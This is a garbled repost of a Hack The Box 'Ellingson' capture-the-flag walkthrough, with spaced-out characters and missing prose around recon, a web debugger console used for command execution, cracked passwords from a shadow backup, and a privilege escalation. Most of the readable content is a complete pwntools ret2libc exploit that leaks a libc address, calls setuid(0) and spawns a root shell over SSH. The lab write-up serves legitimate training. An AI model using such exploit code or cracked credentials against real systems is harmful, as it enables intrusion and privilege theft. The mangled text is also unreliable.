[20262] 2019-11-01_Hackthebox-Ellingson

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2019-11-01_Hackthebox-Ellingson H a c k   t h e   b o x - E l l i n g s o n   n 0 0 B   K h a n   2 0 1 9 - 1 1 - 0 1 C T F h a c k t h e b o x E l l i n g s o n h a c k t h e b o x 线 u s e r . t x t r o o t . t x t   0 0 x 0 1     m a s s c a n 2 2 8 0 N m a p 2 2 , 8 0   0 0 x 0 2     8 0 h t t p 8 0 w e b  
F u z z   / a r t i c l e s / ?   使 p y t h o n o s . u n a m e ( ) w h o a m i p w d   s s h a u t h r o i z e d _ k e y s 0 0 x 0 3     s h e l l
h a l h a l h a l a d m s h a d o w . b a k   j o h n t h e p l a g u e - - p a s s w o r d 1 2 3 m a r g o - - i a m g o d $ 0 8   u s e r . t x t   ^ o ^     0 0 x 0 4       g a r b a g e g d b c h e c k _ u s e r 1 0 0 2   ( m a r g o ) 0   ( r o o t )   t h e p l a g u e   ( 1 0 0 0 )  
l t r a c e 访 N 3 v e R F 3 @ r 1 i S h 3 r 3 !   g d b g e t   * m a i n + 4 1 a u t h s t d i n  
1 3 6   #   p e r l   - e   ' p r i n t   " A "   x   1 3 6   .   " B "   x   6 '   >   i n p u t  
e x p e x p r o o t   s h e l l   f r o m   p w n   i m p o r t   *                                                                                                                                                                                                                                                                                                                                                                                           i m p o r t   b i n a s c i i c o n t e x t ( t e r m i n a l = [ " t m u x " ,   " n e w - w i n d o w s " ] ) c o n t e x t ( o s = " l i n u x " ,   a r c h = " a m d 6 4 " ) s   =   s s h ( h o s t = " 1 0 . 1 0 . 1 0 . 1 3 9 " ,   u s e r = " m a r g o " ,   p a s s w o r d = " i a m g o d $ 0 8 " ) p   =   s . p r o c e s s ( " g a r b a g e " ) j u n k   =   ' A '   *   1 3 6 p l t _ m a i n   =   p 6 4 ( 0 x 4 0 1 6 1 9 ) p l t _ p u t s   =   p 6 4 ( 0 x 4 0 1 0 5 0 ) g o t _ p u t s   =   p 6 4 ( 0 x 4 0 4 0 2 8 ) p o p _ r d i     =   p 6 4 ( 0 x 4 0 1 7 9 b ) p o p _ r s i     =   p 6 4 ( 0 x 4 0 1 7 9 9 ) p a y l o a d   =   j u n k   +   p o p _ r d i   +   g o t _ p u t s   +   p l t _ p u t s   +   p l t _ m a i n p . s e n d l i n e ( p a y l o a d ) p . r e c v u n t i l ( " a c c e s s   d e n i e d . " ) l e a k e d _ p u t s   =   p . r e c v ( ) [ : 8 ] . s t r i p ( ) . l j u s t ( 8 ,   " x 0 0 " ) l o g . s u c c e s s ( " L e a k e d   p u t s @ G L I B C :     "   +   " 0 x "   +   b i n a s c i i . h e x l i f y ( l e a k e d _ p u t s ) . d e c o d e ( " h e x " ) [ : : - 1 ] . e n c o d e ( " h e x " ) ) e a k e d _ p u t s   =   u 6 4 ( l e a k e d _ p u t s ) o f f _ p u t s   =   0 x 8 0 9 c 0 o f f _ s y s     =   0 x 4 f 4 4 0 o f f _ e x e     =   0 x e 4 f a 0 o f f _ s h       =   0 x 1 b 3 e 9 a o f f _ s u i d   =   0 x e 5 9 7 0 b a s e _ l i b c   =   l e a k e d _ p u t s   -   o f f _ p u t s l o g . s u c c e s s ( " G L I B C   b a s e   a d d r e s s :   "   +   " 0 x "   +   b i n a s c i i . h e x l i f y ( p 6 4 ( b a s e _ l i b c ) ) . d e c o d e ( " h e x " ) [ : : - 1 ] . e n c o d e ( " h e x " ) ) l i b c _ e x e     =   p 6 4 ( b a s e _ l i b c   +   o f f _ e x e )
l i b c _ s y s     =   p 6 4 ( b a s e _ l i b c   +   o f f _ s y s ) l i b c _ s h       =   p 6 4 ( b a s e _ l i b c   +   o f f _ s h ) l i b c _ s u i d   =   p 6 4 ( b a s e _ l i b c   +   o f f _ s u i d ) p a y l o a d   =   j u n k   +   p o p _ r d i   +   p 6 4 ( 0 )   +   l i b c _ s u i d   +   p o p _ r d i   +   l i b c _ s h   +   p o p _ r s i   +   p 6 4 ( 0 )   +   p 6 4 ( 0 x d e a d b e e f )   +   l i b c _ e x e p . s e n d l i n e ( p a y l o a d ) p . r e c v u n t i l ( " a c c e s s   d e n i e d . " ) l o g . s u c c e s s ( " E n j o y   y o u r   s h e l l ! " ) p . i n t e r a c t i v e ( )   r o o t . t x t   r o o t h t t p s : / / h a c k s o . m e / e l l i n g s o n - h t b - w a l k t h r o u g h /
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则